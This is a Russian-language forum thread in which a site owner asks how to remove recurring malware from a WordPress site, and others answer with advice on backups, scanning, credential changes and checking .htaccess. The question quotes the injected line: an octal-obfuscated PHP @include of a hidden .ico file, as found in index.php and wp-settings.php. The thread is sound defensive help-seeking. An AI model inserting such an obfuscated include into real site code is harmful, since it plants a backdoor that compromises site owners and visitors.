IgorFCDK1927
@IgorFCDK1927
Junior

Как удалить вирус на сайте Wordpress?

В течении месяца на сайте wordpress начали появляться вирусы и не знаю где можно найти причину появления. В файлах index.php и wp-settings.php появляется вредоносный код типа такого
/*cebb2*/

@include "\057hom\145/o\165ra\146e/y\157ur\141fet\171.co\155.ua\057www\057wp-\151ncl\165des\057js/\164iny\155ce/\056372\067bdd\144.ic\157";

/*cebb2*/


и создается такой файл типа такого .3727bddd.ico . Этот код и файл я удаляю, но через день он опять появляется и причем ico файл постоянно попадает в разные папки, то в wp-includes/js/tinymce, то в wp-content/uploads и другие папки. Удалил уже все темы и установил встроенную, поменял логин и пароль пользователя, удалил все лишние плагины, но ситуация не меняется. Не подскажите что можно сделать в этой ситуации? Спасибо.
  • Вопрос задан
  • 464 просмотра
Решения вопроса 1
alexyarik
@alexyarik
Битрикс разработчик
Самые простые шаги, которые можно предпринять:
Резервные копии
1) Откатиться на доступный автоматический бекап хостинга где не было вируса.
2) Если п.1 не помогает и есть администратор сайта и делали ручные бекапы то можно откатиться на актуальную копию без вирусов.
- сделайте бекап заражённого сайта
3) Если пп 1-2 не помогли, то можно откатиться на любую имеющуюся старую копию с переносом контента с заражённого сайта (xml импорт не используйте)
Антивирусное лечение
1) Подключить антивирусную проверку с лечением, обычно это платная услуга. Если на хостинге нет такой услуги, сменить хостинг.
Профилактика
1) Смена всех доступов
Ответ написан
Пригласить эксперта
Ответы на вопрос 2
lamer350
@lamer350
กำลังสูงสุด
Можно нанять специалиста который все это вычистит. Сами вы вряд ли что то сделаете.
Но мотете попробовать какой то сервис типа virustotal подключить, но он может попросту удалить важный файл, эти файлы необходимо восстановить. Вирус - это не один файл, он создан так чтобы плодится по папкам и его необходимо найти полностью и удалить, а так же найти источник заражения и обезвредить.
Ответ написан
@AlexPasichnyak
Просканируйте сайт плагином NinjaScanner. Я думаю, это только вершина айсберга.
Ничего подозрительного в файле .htaccess нет?
Ответ написан
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Войти через центр авторизации
Похожие вопросы